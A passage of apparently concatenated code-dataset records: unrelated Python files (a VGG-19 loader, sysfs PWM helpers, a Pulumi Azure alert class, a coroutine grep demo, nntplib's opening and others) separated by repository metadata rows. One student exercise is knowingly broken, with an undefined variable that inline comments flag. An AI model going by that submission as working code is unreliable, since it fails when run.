        # stored progress for this achievement in the rated-7x7 block
        return dossier.getRecordValue(_AB.RATED_7X7, 'strategicOperations')

    def _readCurrentProgressValue(self, dossier):
        # current progress is the account's total win count
        return dossier.getTotalStats().getWinsCount()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\strategicoperationsachievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:29:19 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
bfb73d4604aeb01237151f4498cf682dc33c7707 | 4ba3a17f53985700de7b9e2c6ef9b9b5f1ad2e8d | /vgg.py | 3557e2cbdec843382f81dba825f678e3eaf7ef5f | [] | no_license | brjathu/style_kernel | fcba958221ba203ad87c8c855726f8d43f7fdd1e | f9c285f38b54132c957bb1543f434a7d2ae3e178 | refs/heads/master | 2021-07-25T19:37:25.174814 | 2017-11-08T02:07:44 | 2017-11-08T02:07:44 | 103,022,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | import tensorflow as tf
import numpy as np
import scipy.io
# VGG-19 layer names in forward order (conv/relu/pool only; the
# fully-connected head is not used for feature extraction)
VGG19_LAYERS = (
    'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',

    'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',

    'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
    'relu3_3', 'conv3_4', 'relu3_4', 'pool3',

    'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
    'relu4_3', 'conv4_4', 'relu4_4', 'pool4',

    'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
    'relu5_3', 'conv5_4', 'relu5_4'
)
def load_net(data_path):
    """Load VGG-19 weights from a MatConvNet ``.mat`` file.

    Returns ``(weights, mean_pixel)`` where ``mean_pixel`` is the
    per-channel mean of the normalization image.
    """
    data = scipy.io.loadmat(data_path)
    mean = data['normalization'][0][0][0]
    mean_pixel = np.mean(mean, axis=(0, 1))
    weights = data['layers'][0]
    return weights, mean_pixel
def net_preloaded(weights, input_image, pooling):
    """Build the VGG-19 feature graph (TensorFlow 1.x) on ``input_image``.

    ``pooling`` selects 'avg' or max pooling.  Returns a dict mapping each
    layer name to its output tensor.
    """
    net = {}
    current = input_image
    for i, name in enumerate(VGG19_LAYERS):
        # the 4-char prefix encodes the layer kind
        kind = name[:4]
        if kind == 'conv':
            kernels, bias = weights[i][0][0][0][0]
            # matconvnet: weights are [width, height, in_channels, out_channels]
            # tensorflow: weights are [height, width, in_channels, out_channels]
            kernels = np.transpose(kernels, (1, 0, 2, 3))
            bias = bias.reshape(-1)
            current = _conv_layer(current, kernels, bias)
        elif kind == 'relu':
            current = tf.nn.relu(current)
        elif kind == 'pool':
            current = _pool_layer(current, pooling)
        net[name] = current

    assert len(net) == len(VGG19_LAYERS)
    return net
def _conv_layer(input, weights, bias):
    # stride-1 SAME convolution followed by a bias add
    conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
                        padding='SAME')
    return tf.nn.bias_add(conv, bias)


def _pool_layer(input, pooling):
    # 2x2 stride-2 pooling; 'avg' or (default) max
    if pooling == 'avg':
        return tf.nn.avg_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
                              padding='SAME')
    else:
        return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
                              padding='SAME')


def preprocess(image, mean_pixel):
    # center the image on the VGG training mean
    return image - mean_pixel


def unprocess(image, mean_pixel):
    # inverse of preprocess()
    return image + mean_pixel
| [
"brjathu@gmail.com"
] | brjathu@gmail.com |
def naive_find_triplets(lst):
    """Starter stub: collect and return the triplets found in ``lst``.

    Currently returns an empty list; the search logic is left to be
    implemented.
    """
    triplets = []
    return triplets
| [
"david.awogbemila@bison.howard.edu"
] | david.awogbemila@bison.howard.edu |
08d9b6d4b9d5aeff1c5b501d48c1cfbe84d1d66f | 52542d7f93a97db5433293781e0b514f5330a127 | /USV_V1/sensor/src/test_ws/sensor_dep/pwm_func.py | 7970ffc38fabc807d658c570608d343aed3e3cb9 | [
"Apache-2.0"
] | permissive | supcon-nzic/USV | 437002ade39a8d4c70930c56127943a707152b83 | 52c97759f97f3222ca5465a5745842cfeb7f26a1 | refs/heads/master | 2022-11-20T11:38:11.783570 | 2020-07-28T01:09:37 | 2020-07-28T01:09:37 | 279,798,518 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # -*- coding: utf-8 -*-
import string
def pwm_export(pwm_num):
    """Export channel 0 of /sys/class/pwm/pwmchip<pwm_num>."""
    pwm_dir = '/sys/class/pwm/pwmchip{}/export'.format(pwm_num)
    # BUGFIX: the original called ``file.close`` without parentheses, so
    # the sysfs handle was never closed; 'with' guarantees closure.
    # (Also replaces the fragile pwm[:22] magic-index path splicing.)
    with open(pwm_dir, 'w') as file_export:
        file_export.write('0')
def pwm_unexport(pwm_num):
    """Unexport channel 0 of /sys/class/pwm/pwmchip<pwm_num>."""
    pwm_dir = '/sys/class/pwm/pwmchip{}/unexport'.format(pwm_num)
    # BUGFIX: original ``file.close`` (no parentheses) leaked the handle
    with open(pwm_dir, 'w') as file_unexport:
        file_unexport.write('0')
def pwm_period_config(pwm_num, period):
    """Set the period (ns) of pwmchip<pwm_num>/pwm0."""
    # format-built path replaces the fragile pwm[:22] magic-index splice
    pwm_dir = '/sys/class/pwm/pwmchip{}/pwm0/period'.format(pwm_num)
    with open(pwm_dir, 'w') as file_period:
        file_period.write(str(period))
def pwm_duty_cycle_config(pwm_num, duty_cycle):
    """Set the duty cycle (ns) of pwmchip<pwm_num>/pwm0."""
    pwm_dir = '/sys/class/pwm/pwmchip{}/pwm0/duty_cycle'.format(pwm_num)
    with open(pwm_dir, 'w') as file_duty:
        file_duty.write(str(duty_cycle))
def pwm_enable(pwm_num):
    """Enable output on pwmchip<pwm_num>/pwm0 (writes '1' to enable)."""
    pwm_dir = '/sys/class/pwm/pwmchip{}/pwm0/enable'.format(pwm_num)
    with open(pwm_dir, 'w') as file_enable:
        file_enable.write('1')
def pwm_capture(pwm_num):
    """Read one capture result from pwmchip<pwm_num>/pwm0.

    The sysfs 'capture' file contains "<period> <duty_cycle>"; both are
    returned as ints: ``(period, duty_cycle)``.
    """
    pwm_dir = '/sys/class/pwm/pwmchip{}/pwm0/capture'.format(pwm_num)
    with open(pwm_dir) as file_capture:
        fields = file_capture.read().split(' ')
    return int(fields[0]), int(fields[1])
| [
"qiuyunpeng@nz-ic.com"
] | qiuyunpeng@nz-ic.com |
d6915f891d241df17076fd4aac05f43ece785f6d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/10/usersdata/73/23003/submittedfiles/testes.py | 946f242d6568fd56d5fe56ac4d96a251e4c428f5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # -*- coding: utf-8 -*-
# NOTE(review): student exercise submission (pt-BR), Python 2 (print
# statement, numeric input()).  Defects are flagged inline; indentation
# below is a best-effort reconstruction — TODO confirm against intent.
from __future__ import division
qs=input('quantidade de salas:')
for i in range (0,qs,1):
    # BUG? 'sala' is re-created on every iteration, so only the last
    # room's value survives the loop
    sala=[]
    sala.append(input('quantidade de vidas da sala:'))
    print sala
pe=input('porta de entrada:')
ps=input('porta de saída:')
soma=0
for i in range(sala[pe],sala[ps]+1,1):
    a=sala[pe+i]
    soma=soma+a
    if sala[pe]==sala[ps]:
        break
# BUG: 's' is undefined — presumably 'soma' was intended
print s
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
def mais_frequente(lista_palavras):
    """Return the most frequent word in ``lista_palavras``.

    BUGFIX: the original called an undefined ``index(...)`` (NameError)
    and would have returned a count rather than the word itself.
    Raises ValueError on an empty list (the original also failed there).
    """
    contagem = {}
    for palavra in lista_palavras:
        if palavra not in contagem:
            contagem[palavra] = 1
        else:
            contagem[palavra] += 1
    # key with the highest count (ties resolved by dict iteration order)
    return max(contagem, key=contagem.get)
"you@example.com"
] | you@example.com |
02e60d332c813451d3d9c5255a8f743db92ca55a | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/insights/latest/metric_alert.py | 50b45a69d4e1e078c908b4c4f226f57d69e1c428 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 12,275 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['MetricAlert']
class MetricAlert(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MetricAlertActionArgs']]]]] = None,
auto_mitigate: Optional[pulumi.Input[bool]] = None,
criteria: Optional[pulumi.Input[Union[pulumi.InputType['MetricAlertMultipleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['MetricAlertSingleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['WebtestLocationAvailabilityCriteriaArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
evaluation_frequency: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_resource_region: Optional[pulumi.Input[str]] = None,
target_resource_type: Optional[pulumi.Input[str]] = None,
window_size: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
The metric alert resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MetricAlertActionArgs']]]] actions: the array of actions that are performed when the alert rule becomes active, and when an alert condition is resolved.
:param pulumi.Input[bool] auto_mitigate: the flag that indicates whether the alert should be auto resolved or not. The default is true.
:param pulumi.Input[Union[pulumi.InputType['MetricAlertMultipleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['MetricAlertSingleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['WebtestLocationAvailabilityCriteriaArgs']]] criteria: defines the specific alert criteria information.
:param pulumi.Input[str] description: the description of the metric alert that will be included in the alert email.
:param pulumi.Input[bool] enabled: the flag that indicates whether the metric alert is enabled.
:param pulumi.Input[str] evaluation_frequency: how often the metric alert is evaluated represented in ISO 8601 duration format.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] rule_name: The name of the rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scopes: the list of resource id's that this metric alert is scoped to.
:param pulumi.Input[int] severity: Alert severity {0, 1, 2, 3, 4}
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
:param pulumi.Input[str] target_resource_region: the region of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
:param pulumi.Input[str] target_resource_type: the resource type of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
:param pulumi.Input[str] window_size: the period of time (in ISO 8601 duration format) that is used to monitor alert activity based on the threshold.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['actions'] = actions
__props__['auto_mitigate'] = auto_mitigate
if criteria is None:
raise TypeError("Missing required property 'criteria'")
__props__['criteria'] = criteria
if description is None:
raise TypeError("Missing required property 'description'")
__props__['description'] = description
if enabled is None:
raise TypeError("Missing required property 'enabled'")
__props__['enabled'] = enabled
if evaluation_frequency is None:
raise TypeError("Missing required property 'evaluation_frequency'")
__props__['evaluation_frequency'] = evaluation_frequency
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if rule_name is None:
raise TypeError("Missing required property 'rule_name'")
__props__['rule_name'] = rule_name
__props__['scopes'] = scopes
if severity is None:
raise TypeError("Missing required property 'severity'")
__props__['severity'] = severity
__props__['tags'] = tags
__props__['target_resource_region'] = target_resource_region
__props__['target_resource_type'] = target_resource_type
if window_size is None:
raise TypeError("Missing required property 'window_size'")
__props__['window_size'] = window_size
__props__['last_updated_time'] = None
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:insights/v20180301:MetricAlert")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(MetricAlert, __self__).__init__(
'azure-nextgen:insights/latest:MetricAlert',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'MetricAlert':
"""
Get an existing MetricAlert resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return MetricAlert(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def actions(self) -> pulumi.Output[Optional[Sequence['outputs.MetricAlertActionResponse']]]:
"""
the array of actions that are performed when the alert rule becomes active, and when an alert condition is resolved.
"""
return pulumi.get(self, "actions")
@property
@pulumi.getter(name="autoMitigate")
def auto_mitigate(self) -> pulumi.Output[Optional[bool]]:
"""
the flag that indicates whether the alert should be auto resolved or not. The default is true.
"""
return pulumi.get(self, "auto_mitigate")
@property
@pulumi.getter
def criteria(self) -> pulumi.Output[Any]:
"""
defines the specific alert criteria information.
"""
return pulumi.get(self, "criteria")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
the description of the metric alert that will be included in the alert email.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[bool]:
"""
the flag that indicates whether the metric alert is enabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="evaluationFrequency")
def evaluation_frequency(self) -> pulumi.Output[str]:
"""
how often the metric alert is evaluated represented in ISO 8601 duration format.
"""
return pulumi.get(self, "evaluation_frequency")
@property
@pulumi.getter(name="lastUpdatedTime")
def last_updated_time(self) -> pulumi.Output[str]:
"""
Last time the rule was updated in ISO8601 format.
"""
return pulumi.get(self, "last_updated_time")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
the list of resource id's that this metric alert is scoped to.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter
def severity(self) -> pulumi.Output[int]:
"""
Alert severity {0, 1, 2, 3, 4}
"""
return pulumi.get(self, "severity")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetResourceRegion")
def target_resource_region(self) -> pulumi.Output[Optional[str]]:
"""
the region of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
"""
return pulumi.get(self, "target_resource_region")
@property
@pulumi.getter(name="targetResourceType")
def target_resource_type(self) -> pulumi.Output[Optional[str]]:
"""
the resource type of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
"""
return pulumi.get(self, "target_resource_type")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="windowSize")
def window_size(self) -> pulumi.Output[str]:
"""
the period of time (in ISO 8601 duration format) that is used to monitor alert activity based on the threshold.
"""
return pulumi.get(self, "window_size")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
d59bcbbad39d74bcd294b6117bc8ca2b88bc83fe | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day4-teacher/5 面向过程编程.py | 77d4e49cfd933d7a8fd11f330b2d27488f5bcdea | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | '''
强调:面向过程编程绝对不是用函数编程那么简单
面向过程的编程思想:核心是过程二字,过程即解决问题的步骤,即先干什么再干什么
基于该思想去编写程序就好比在设计一条流水线,是一种机械式的编程思想
优点:复杂的问题流程化,进而简单化
缺点:可扩展性差
'''
# import os
# g=os.walk(r'C:\Users\Administrator\PycharmProjects\19期\day4\a')
# for dirname,_,files in g:
# for file in files:
# abs_file_path=r'%s\%s' %(dirname,file)
# print(abs_file_path)
#grep -rl 'root' /etc
import os
def init(func):
    """Decorator: build the generator and advance it to its first yield,
    so callers can .send() into the coroutine immediately."""
    def primed(*args, **kwargs):
        gen = func(*args, **kwargs)
        next(gen)  # prime the coroutine
        return gen
    return primed
def search(filepath,target): # send each found file path on to the next stage
    """Stage 1: walk ``filepath`` and push every file path into ``target``."""
    g = os.walk(filepath)
    for dirname, _, files in g:
        for file in files:
            # NOTE(review): Windows-style backslash path join
            abs_file_path = r'%s\%s' % (dirname, file)
            target.send(abs_file_path)

@init
def opener(target):
    """Stage 2: open each received path (binary) and pass the handle on."""
    while True:
        abs_file_path=yield
        with open(abs_file_path,'rb') as f:
            target.send((f,abs_file_path))

@init
def cat(target):
    """Stage 3: stream the file line by line; stop early once the
    downstream grep reports a match for this file."""
    while True:
        f,abs_file_path=yield
        for line in f:
            res=target.send((line,abs_file_path))
            if res:
                break

@init
def grep(pattern,target):
    """Stage 4: forward file paths whose current line contains ``pattern``.

    Yields ``tag`` back to cat() so it can short-circuit after a match.
    """
    tag=False
    # lines arrive as bytes, so the pattern is encoded once up front
    pattern = pattern.encode('utf-8')
    while True:
        line,abs_file_path=yield tag
        tag=False
        if pattern in line:
            target.send(abs_file_path)
            tag=True

@init
def printer():
    """Stage 5 (sink): print each matching file path."""
    while True:
        abs_file_path=yield
        print(abs_file_path)
| [
"lincappu@163.com"
] | lincappu@163.com |
38ffb9f0f778b5e8343554b367df1434ad7e94bf | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/dogma/eventCounters.py | abbf36a0815d4c95154b8703ffd3d80fd198ea7f | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,191 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\dogma\eventCounters.py
from contextlib import contextmanager
class EventCount(object):
    """Tracks, per key, how many 'events' are currently in flight.

    Event() is a context manager that bumps the key's counter on entry
    and, on exit, decrements it and fires the _OnEvent hook (which
    subclasses may override)."""

    def __init__(self):
        # key -> number of currently active events for that key
        self.__active = {}

    @contextmanager
    def Event(self, key):
        self._AddEventCount(key)
        try:
            yield
        finally:
            self._DecreaseEventCount(key)
            self._OnEvent(key)

    def _AddEventCount(self, key):
        self.__active[key] = self.__active.get(key, 0) + 1

    def _DecreaseEventCount(self, key):
        remaining = self.__active[key] - 1
        if remaining < 1:
            del self.__active[key]
        else:
            self.__active[key] = remaining

    def IsEventHappening(self, key):
        """Return True if at least one event for *key* is active.
        A key of None is never considered active."""
        return key is not None and self.__active.get(key, 0) > 0

    def _OnEvent(self, key):
        # Hook for subclasses; called once per finished event.
        pass
class BrainUpdate(EventCount):
    """EventCount specialization that invokes *callback* with the key
    every time an event for that key finishes."""

    def __init__(self, callback):
        super(BrainUpdate, self).__init__()
        self.__notify = callback

    def _OnEvent(self, key):
        self.__notify(key)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
f989dc9c65e8f3ba691c10722a36b9be7e818a0a | e7bba3dd662bf2778c36a406f72ee93b2ea05e11 | /CardinalityEstimationTestbed/Overall/quicksel/test/python/test_include.py | 4f19223fb4f8307520b7d4b1f74308bb4c36e7ba | [
"Apache-2.0"
] | permissive | TsinghuaDatabaseGroup/AI4DBCode | 37e45b176bc94e77fe250ea45f0ad7b9054c7f11 | a8989bfadcf551ee1dee2aec57ef6b2709c9f85d | refs/heads/master | 2023-07-07T05:42:15.590000 | 2023-07-04T01:04:15 | 2023-07-04T01:04:15 | 217,175,047 | 53 | 35 | null | 2023-06-20T13:00:17 | 2019-10-24T00:03:14 | Scala | UTF-8 | Python | false | false | 688 | py | import sys
sys.path.append('../../src/python')
# isomer = imp.load_source('isomer', '../../src/python/isomer.py')
# import imp
import pprint
from quickSel import isomer
pp = pprint.PrettyPrinter(indent=2)
def Node(query):
    """Wrap *query* in an isomer.STHoles2d node built from the query's
    own boundary, with the query as its only member."""
    return isomer.STHoles2d(query.boundary, [query])
def Query(boundary, freq, uid=None):
    """Construct an isomer.Query2d from *boundary*, observed frequency
    *freq*, and optional query id *uid*."""
    return isomer.Query2d(boundary, freq, uid)
def Boundary(boundary):
    """Convert a raw boundary spec into an isomer.Boundary object."""
    return isomer.Boundary(boundary)
# Module-level counter handing out sequential query ids; kept in a
# one-element list so gen_query can mutate it without a `global` statement.
qid = [0]
def gen_query(boundary):
    """Build a Query2d for *boundary* whose frequency equals the boundary's
    area, computed as (r - l) * (t - b), and whose uid is the next
    sequential id from the module-level counter."""
    boundary = isomer.Boundary(boundary)
    freq = (boundary.r - boundary.l) * (boundary.t - boundary.b)
    query = Query(boundary, freq, qid[0])
    qid[0] = qid[0] + 1
    return query
| [
"zhouxuan19@mails.tsinghua.edu.cn"
] | zhouxuan19@mails.tsinghua.edu.cn |
a35bae9f502d173b1fff236cf84aff4322441cb5 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/02_python核心编程/03_网络编程/day03_网络通信过程/demo16_网络通信过程中的MAC地址_IP地址.py | 25e25fb3f3e669b8dbe1ab7815b5d62ae64cb664 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # 一.通信过程中
# 1.源/目的MAC地址在两个设备间变化
# 2.源/目的IP地址不变
# 二.总结
# 1.MAC地址: 唯一标识数据转发的实际网卡地址
# 2.IP地址: 唯一标识逻辑地址
# 3.网络掩码: 协助确认网络号
# 4.默认网关: 目的IP不在同一网段时, 转发给默认网关
# 5.端口: 唯一标识非同一台设备上的应用
# 6.PED: 唯一标识同一台设备上的应用
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
f545ab96abec98ed85e1c53c4d829e3969265b38 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/nntplib.py | fcb01d319b49ea0afe298ba08fdec275f603e7c4 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 42,807 | py | """An NNTP client class based on:
- RFC 977: Network News Transfer Protocol
- RFC 2980: Common NNTP Extensions
- RFC 3977: Network News Transfer Protocol (version 2)
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'rb') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Incompatible changes from the 2.x nntplib:
# - all commands are encoded as UTF-8 data (using the "surrogateescape"
# error handler), except for raw message data (POST, IHAVE)
# - all responses are decoded as UTF-8 data (using the "surrogateescape"
# error handler), except for raw message data (ARTICLE, HEAD, BODY)
# - the `file` argument to various methods is keyword-only
#
# - NNTP.date() returns a datetime object
# - NNTP.newgroups() and NNTP.newnews() take a datetime (or date) object,
# rather than a pair of (date, time) strings.
# - NNTP.newgroups() and NNTP.list() return a list of GroupInfo named tuples
# - NNTP.descriptions() returns a dict mapping group names to descriptions
# - NNTP.xover() returns a list of dicts mapping field names (header or metadata)
# to field values; each dict representing a message overview.
# - NNTP.article(), NNTP.head() and NNTP.body() return a (response, ArticleInfo)
# tuple.
# - the "internal" methods have been marked private (they now start with
# an underscore)
# Other changes from the 2.x/3.1 nntplib:
# - automatic querying of capabilities at connect
# - New method NNTP.getcapabilities()
# - New method NNTP.over()
# - New helper function decode_header()
# - NNTP.post() and NNTP.ihave() accept file objects, bytes-like objects and
# arbitrary iterables yielding lines.
# - An extensive test suite :-)
# TODO:
# - return structured data (GroupInfo etc.) everywhere
# - support HDR
# Imports
import re
import socket
import collections
import datetime
import warnings
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
from email.header import decode_header as _email_decode_header
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ["NNTP",
"NNTPReplyError", "NNTPTemporaryError", "NNTPPermanentError",
"NNTPProtocolError", "NNTPDataError",
"decode_header",
]
# maximal line length when calling readline(). This is to prevent
# reading arbitrary lenght lines. RFC 3977 limits NNTP line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
# Exceptions raised when an error or invalid response is received
# Exception hierarchy.  Everything raised by nntplib derives from NNTPError,
# so callers can catch the base class to handle any protocol-level failure.
class NNTPError(Exception):
    """Base class for all nntplib exceptions"""
    def __init__(self, *args):
        Exception.__init__(self, *args)
        # Keep the raw server response text around for callers; fall back to
        # a placeholder when the exception was raised without arguments.
        try:
            self.response = args[0]
        except IndexError:
            self.response = 'No response given'
class NNTPReplyError(NNTPError):
    """Unexpected [123]xx reply"""
    pass
class NNTPTemporaryError(NNTPError):
    """4xx errors"""
    pass
class NNTPPermanentError(NNTPError):
    """5xx errors"""
    pass
class NNTPProtocolError(NNTPError):
    """Response does not begin with [1-5]"""
    pass
class NNTPDataError(NNTPError):
    """Error in response data"""
    pass
# Standard port used by NNTP servers
NNTP_PORT = 119
NNTP_SSL_PORT = 563
# Response numbers that are followed by additional text (e.g. article)
_LONGRESP = {
'100', # HELP
'101', # CAPABILITIES
'211', # LISTGROUP (also not multi-line with GROUP)
'215', # LIST
'220', # ARTICLE
'221', # HEAD, XHDR
'222', # BODY
'224', # OVER, XOVER
'225', # HDR
'230', # NEWNEWS
'231', # NEWGROUPS
'282', # XGTITLE
}
# Default decoded value for LIST OVERVIEW.FMT if not supported
_DEFAULT_OVERVIEW_FMT = [
